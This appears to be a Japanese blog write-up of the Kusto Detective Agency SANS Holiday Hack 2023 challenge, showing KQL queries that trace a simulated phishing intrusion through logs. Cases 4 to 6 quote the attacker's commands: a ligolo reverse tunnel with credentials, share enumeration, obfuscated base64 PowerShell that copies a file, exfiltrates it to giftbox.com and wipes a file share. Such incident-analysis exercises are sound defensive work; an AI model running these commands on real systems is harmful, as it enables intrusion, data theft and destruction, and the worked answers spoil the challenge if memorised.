LoginSignup
0
0

Kusto Detective Agency SANS Holiday Hack 2023 のメモ

Last updated at Posted at 2023-12-14

Kusto Detective Agency SANS Holiday Hack 2023

Security インシデントっぽいシナリオでログから問題を解いていく系のチャレンジ

Onboarding: Welcome to SANS Holiday Hack 2023!

How many Craftperson Elf's are working from laptops?

Craftperson Elf is 何?となったが、Employees テーブルを見るとわかる。

Answer
Employees
| where role == "Craftsperson Elf"
| where hostname has "LAPTOP"
| count

Case 1: Welcome to Operation Giftwrap: Defending the Geese Island network

The alert says the user clicked the malicious link 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

What is the email address of the employee who received this phishing email?

What is the email address that was used to send this spear phishing email?

What was the subject line used in the spear phishing email?

結構そのままな感じ

Answer
Email
| where link == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

Case 2: Someone got phished! Let's dig deeper on the victim...

If the victim is someone important, our organization could be doomed! Hurry up, let's find out more about who was impacted!

What is the role of our victim in the organization?

What is the hostname of the victim's machine?

What is the source IP linked to the victim?

これも結構そのままな感じ

Answer
let recipientAddress = Email
| where link == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
| project recipient;
Employees
| where email_addr in(recipientAddress)

Case 3: That's not good. What happened next?

Use our various security log datasources to uncover more details about what happened to Alabaster.

What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!

What file is dropped to Alabaster's machine shortly after he downloads the malicious file?

Answer
OutboundNetworkEvents
| where url == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
| project timestamp
| extend binTimestamp = bin(timestamp,5m)
| join kind=inner( FileCreationEvents
| where hostname == "Y1US-DESKTOP"
| extend binTimestamp = bin(timestamp,5m)
) on binTimestamp
| where timestamp <= timestamp1

Case 4: A compromised host! Time for a deep dive.

Can you take a closer look at endpoint data from Alabaster's machine? We need to figure out exactly what happened here. Word of this hack is starting to spread to the other elves, so work quickly and quietly!

The attacker created an reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?

What is the timestamp when the attackers enumerated network shares on the machine?

What was the hostname of the system the attacker moved laterally to?

Answer

とりあえず Case 3 のタイムスタンプ以降の ProcessEvents を見てみる

ProcessEvents
| where hostname == "Y1US-DESKTOP"
| where timestamp >= datetime(2023-12-02T10:14:21Z)

image.png

あきらかに怪しいのが1つある

"ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof

ligolo は ポートフォワード用のツールっぽい。

https://github.com/sysdream/ligolo

Q1 はこれでよさそう

同じ parent_process_hash を持つ一覧を調べる

ProcessEvents
| where hostname == "Y1US-DESKTOP"
| where timestamp >= datetime(2023-12-02T10:14:21Z)
| where parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f"

Q2 enumerated network shares on the machine するにはどんなコマンドが必要か

image.png

net コマンドはいろいろできるらしい

https://learn.microsoft.com/ja-jp/troubleshoot/windows-server/networking/net-commands-on-operating-systems

parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f" の結果にはいろいろあるが 47 件なので目視で怪しそうなのをチェック

netstat
ipconfig
arp -a
netstat -an
nbtstat-n
net view /DOMAIN
net share
net use
net config
systeminfo
consent.exe 7196 426 0000028999E22E30
cmd.exe /C net use \\NorthPolefileshare\c$ /user:admin AdminPass123

Case 5: A hidden message

When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?

What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)

The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?

Answer

Case 4 の parent_process_hash から以下 3 つのコマンドが見つかる

2023-12-24T16:07:47Z	cmd.exe	614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f	C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn
2023-12-24T16:58:43Z	cmd.exe	614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f	C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4=
2023-12-25T10:44:27Z	cmd.exe	614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f	C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ=

それぞれ base64decode

print(base64_decode_tostring("KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"))

> ( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''
print(base64_decode_tostring("W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4="))

> [StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN
print(base64_decode_tostring("QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ="))

> C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$

1つ目のコマンドは、文字列が反転されてるっぽい。そのままコマンド実行しても反転したままだったので以下のように実施

image.png

2つ目のコマンドの前半をきれいにして実行してみる

[String]::JoIn( '', [Char[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))

downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file

image.png

Case 6: The final step!

We know that the attackers stole Santa's naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?

What is the name of the executable the attackers used in the final malicious command?

What was the command line flag used alongside this executable?

これは Case 5 の 3 つめのコマンドですでに確認できている

Answer
print(base64_decode_tostring("QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ="))

> C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0